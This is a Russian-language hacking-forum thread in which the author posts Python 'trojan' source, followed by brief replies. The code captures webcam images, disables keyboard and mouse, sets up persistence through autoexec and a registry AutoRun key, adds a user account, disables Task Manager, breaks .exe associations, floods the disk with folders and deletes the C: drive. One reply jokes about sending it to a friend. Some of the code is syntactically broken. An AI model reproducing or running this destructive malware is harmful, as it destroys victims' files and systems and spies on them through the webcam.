Загрузка...

[python] вредоносный код (троян)

Тема в разделе Вирусология создана пользователем id637541997 6 мар 2022. (поднята 10 мар 2022) 2287 просмотров

Загрузка...
  1. id637541997
    id637541997 Автор темы 6 мар 2022 13 27 май 2021
    Ну усе как бы. Во первых у меня закончилась фантазия. Во вторых все 3 софта (скрипта) настроены на одну командную выполнение.
    То есть либо портить либо убивать винду.
    Ну и я сделал именно то что и убьет и сожрет все файлы.
    Что будет:
    Удаление всех фалов.
    Заражение autoexec
    Создание 10кк папок.
    И дофига больше. В конце винда просто выключится.
    Я продумал все даже для безопастного режима.
    Тк он не сможет прогрузить 10кк папок, и просто вылетает. *проверил на себе*
    ===============================================================
    Код основа + подгрузка нужных нам библиотек + доступ к камере:
    Python
    import os #импорт выполняющяя cmd
    import cv2 #ипорт библиотеки cv2

    #доступ к камере
    camera = cv2.VideoCapture(0)
    for i in range(10)
    return_value, image = camera.read()
    cv2.imwrite("opencv"+str(i)+".png", image)
    del(camera)
    ===============================================================
    Выключение говна которое может все остановить.
    Python
    #блокировка мыши,клавиатуры и многово

    os.system ("@echo off")
    os.system ("rundll32 keyboard,disable")
    os.system ("rundll32 mouse,disable")
    ===============================================================
    Сам троян.
    Python
    #сам троян...

    os.system ("copy %0 %windir%/system")
    os.system ("""
    // %0
    // %windir%
    echo run=%windir%/system/*.bat """)
    os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
    os.system ("deltree /y c:\autoexec.bat")
    os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
    os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
    echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
    start %temp%\mes.js.""")
    os.system ("attrib c:\autoexec.bat +h +s +a +r")
    os.system ("pause")
    os.system ("copy %0 C:\System.bat")
    os.system ("label C:222")
    os.system ("time 22:22")
    os.system ("date 22.2.22")
    os.system ("assoc .exe=.txt")
    os.system ("net user "2222" /add")
    os.system ("del "%SystemRoot%\Media" /q >nul")
    os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
    os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
    os.system ("rundll32 user,SwapMouseButton")
    os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
    os.system ("del "%SystemRoot%Cursors*.*" >nul")
    os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
    os.system ("del c:Program Files/q")
    os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
    os.system ("rundll32 user,disableoemlayer")
    os.system ("rd C: /s /q")
    =========================================================================
    ПОЛНЫЙ КОД:
    Python
    import os #импорт выполняющяя cmd

    import cv2 #ипорт библиотеки cv2

    #доступ к камере
    camera = cv2.VideoCapture(0)
    for i in range(10)
    return_value, image = camera.read()
    cv2.imwrite("opencv"+str(i)+".png", image)
    del(camera)

    #блокировка мыши,клавиатуры и многово
    os.system ("@echo off")
    os.system ("rundll32 keyboard,disable")
    os.system ("rundll32 mouse,disable")
    #сам троян...
    os.system ("copy %0 %windir%/system")
    os.system ("""
    // %0
    // %windir%
    echo run=%windir%/system/*.bat """)
    os.system ("if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r")
    os.system ("deltree /y c:\autoexec.bat")
    os.system ("echo autoexec.bat echo ti lolka > c:\autoexec.bat")
    os.system ("""echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
    echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
    start %temp%\mes.js.""")
    os.system ("attrib c:\autoexec.bat +h +s +a +r")
    os.system ("pause")
    os.system ("copy %0 C:\System.bat")
    os.system ("label C:222")
    os.system ("time 22:22")
    os.system ("date 22.2.22")
    os.system ("assoc .exe=.txt")
    os.system ("net user "2222" /add")
    os.system ("del "%SystemRoot%\Media" /q >nul")
    os.system ("FOR /L %%i IN (1,1,100000000) DO md %%i")
    os.system ("""copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul""")
    os.system ("rundll32 user,SwapMouseButton")
    os.system ("""reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul""")
    os.system ("del "%SystemRoot%Cursors*.*" >nul")
    os.system ("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f")
    os.system ("del c:Program Files/q")
    os.system ("del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul")
    os.system ("rundll32 user,disableoemlayer")
    os.system ("rd C: /s /q")
    ============================================

    :vk: https://vk.com/lovegrafon
     
  2. StaruIIPec
    StaruIIPec 9 мар 2022 0 9 мар 2022
    Пойду другу кину
     
    1. id637541997 Автор темы
  3. s1andiw
    s1andiw 14 мар 2022 0 14 мар 2022
    весь код на BAT
     
    1. id637541997 Автор темы
      s1andiw, я знаю , ибо е скрываю
  4. s1nolegoo
    s1nolegoo 14 мар 2022 0 29 янв 2022
    бро, а как это делается? Я не хочу не кому это отправлять просто интересно)
     
    1. s1andiw
      s1nolegoo, никак, обычный cmd.exe, не считая обычного пайтона
    2. id637541997 Автор темы
      s1andiw, ну на счет кмд exe могу поспорить а так часть команд через селл выполняются, вторая часть отвечает за интерфу а третья это кмд
  5. utilitProger
    Бессмысленая трата времени:
    Во первых, для запуска у жертвы должен быть интерпритатор, во вторых не о каких компиляциях в ехе файл не может быть и речи, ибо windows defender и smart screen детектит любые файлы pyinstaller-а.
     
Top